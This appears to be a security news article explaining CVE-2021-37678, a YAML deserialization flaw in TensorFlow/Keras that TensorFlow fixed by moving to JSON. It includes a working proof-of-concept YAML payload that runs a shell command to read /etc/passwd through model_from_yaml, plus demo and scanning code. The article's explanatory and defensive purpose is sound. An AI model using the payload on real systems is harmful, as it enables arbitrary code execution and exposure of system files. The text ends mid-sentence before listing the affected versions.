TensorFlow is a machine learning and artificial intelligence framework with a Python API, developed by Google. To fix a code execution vulnerability, the TensorFlow project has decided to drop support for YAML. YAML (a recursive acronym for "YAML Ain't Markup Language", originally "Yet Another Markup Language") is a human-readable data serialization format. Its design draws on a variety of other languages, including C, Python, and Perl, and on data formats ranging from XML to email.
CVE-2021-37678: TensorFlow untrusted deserialization vulnerability
Security researcher Arjun Shibu found a security vulnerability in TensorFlow and Keras, tracked as CVE-2021-37678. It is an untrusted deserialization flaw caused by insecure handling of YAML: an attacker can execute arbitrary code when an application loads a Keras model that was serialized in YAML format. The vulnerability has a CVSS score of 9.3. Deserialization vulnerabilities occur when an application reads forged or malicious data from an untrusted source. While reading and deserializing that data, the application may be pushed into a denial-of-service (DoS) condition or may even execute code chosen by the attacker.
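The general mechanism can be illustrated without YAML at all. The following is a minimal sketch using Python's standard `pickle` module as an analogous case, not the TensorFlow code path itself; the `Malicious` class and the harmless `eval` expression are hypothetical stand-ins for an attacker's payload.

```python
import pickle


class Malicious:
    """Hypothetical attacker-controlled object (illustration only)."""

    def __reduce__(self):
        # pickle records "call eval('sum(range(5))')" in the byte stream
        # and replays that call when the stream is loaded.
        return (eval, ("sum(range(5))",))


# What an attacker would hand to the victim application.
blob = pickle.dumps(Malicious())

# The victim believes it is only reading data, yet eval() runs here.
result = pickle.loads(blob)
print(result)
```

The loaded value is whatever the replayed call returned, not a `Malicious` instance. A real payload would swap the harmless expression for something like a shell command.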
The vulnerability comes from TensorFlow's call to PyYAML's yaml.unsafe_load() function:
[Figure: the vulnerable yaml.unsafe_load() function call in TensorFlow]
The unsafe_load function deserializes YAML data and resolves all tags, including those in input from insecure or untrusted sources. Ideally, unsafe_load is called only when the input comes from a trusted source. However, attackers can exploit this mechanism to execute code by injecting a malicious payload into serialized YAML data.
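The difference between the two loaders can be sketched as follows, assuming PyYAML 5.1 or later is installed. The `plain` and `tagged` documents are made up for illustration, and the tagged one only calls the harmless `os.getcwd`.

```python
import os

import yaml  # PyYAML, assumed to be version 5.1 or later

plain = "name: demo\nlayers: [dense, relu]"
# Harmless stand-in for a payload: asks the loader to call os.getcwd().
tagged = "!!python/object/apply:os.getcwd []"

# safe_load builds only plain Python data (dict, list, str, numbers, ...).
config = yaml.safe_load(plain)

# safe_load has no constructor for python/* tags, so it raises an error.
rejected = False
try:
    yaml.safe_load(tagged)
except yaml.YAMLError as exc:
    rejected = True
    print("safe_load rejected the document:", exc)

# unsafe_load resolves the tag and actually calls the named function.
resolved = yaml.unsafe_load(tagged)
print("unsafe_load returned:", resolved)
```

Because `unsafe_load` will call any importable function named in a tag, the same document shape works with far more dangerous targets than `os.getcwd`.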
The PoC exploit code of this vulnerability is as follows:
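    from tensorflow.keras import models

    # YAML payload: the !!python tags make the loader build a type whose
    # 'extend' attribute is exec, so the listitems string gets executed.
    payload = '''
    !!python/object/new:type
    args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
    listitems: "__import__('os').system('cat /etc/passwd')"
    '''

    # Vulnerable versions pass the payload to yaml.unsafe_load()
    models.model_from_yaml(payload)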
TensorFlow no longer supports YAML
After the vulnerability was reported, TensorFlow decided to drop YAML support and use JSON deserialization instead.
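Why JSON is the safer choice can be sketched with the standard library alone. Keras exposes `to_json()` and `model_from_json()` for this purpose, but the configuration below is a hypothetical, heavily simplified stand-in rather than real Keras output. JSON has no tag mechanism, so parsing can only produce plain data types.

```python
import json

# Hypothetical, simplified model config; not actual Keras output.
config_text = json.dumps({
    "class_name": "Sequential",
    "config": {"name": "demo", "layers": [{"class_name": "Dense", "units": 4}]},
    # An injected string stays an inert string after parsing.
    "note": "__import__('os').system('id')",
})

config = json.loads(config_text)

PLAIN_SCALARS = (str, int, float, bool, type(None))


def only_plain_types(value):
    """Return True if value consists solely of JSON-representable types."""
    if isinstance(value, dict):
        return all(
            isinstance(k, str) and only_plain_types(v) for k, v in value.items()
        )
    if isinstance(value, list):
        return all(only_plain_types(item) for item in value)
    return isinstance(value, PLAIN_SCALARS)


print(only_plain_types(config))
```

The parser never instantiates arbitrary classes or calls functions named in the input, so any interpretation of names such as `class_name` is left to the application code that consumes the parsed dictionary.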
But TensorFlow is not the only project that uses PyYAML's unsafe_load; the function is widely used in Python projects. A GitHub search returns thousands of results that reference it, and developers have come up with a solution:
[Figure: GitHub search results for unsafe_load]
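A project can run a similar search over its own code. The following is a minimal sketch using the standard `ast` module; the helper name `find_unsafe_yaml_calls` and the sample source are hypothetical. It matches by function name only, so it does not prove that the call belongs to PyYAML.

```python
import ast

# Function names treated as risky in this sketch.
RISKY = {"unsafe_load", "unsafe_load_all"}


def find_unsafe_yaml_calls(source, filename="<string>"):
    """Return sorted (line, name) pairs for calls whose name is in RISKY."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Attribute):   # e.g. yaml.unsafe_load(...)
            name = func.attr
        else:                                 # e.g. unsafe_load(...)
            name = getattr(func, "id", None)
        if name in RISKY:
            findings.append((node.lineno, name))
    return sorted(findings)


sample = '''
import yaml
a = yaml.safe_load(text)
b = yaml.unsafe_load(text)
'''

findings = find_unsafe_yaml_calls(sample)
print(findings)
```

Each hit is a candidate for replacement with `yaml.safe_load` if the input does not need Python-specific tags.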
TensorFlow has also released a patch for this vulnerability. The affected and fixed versions are as follows: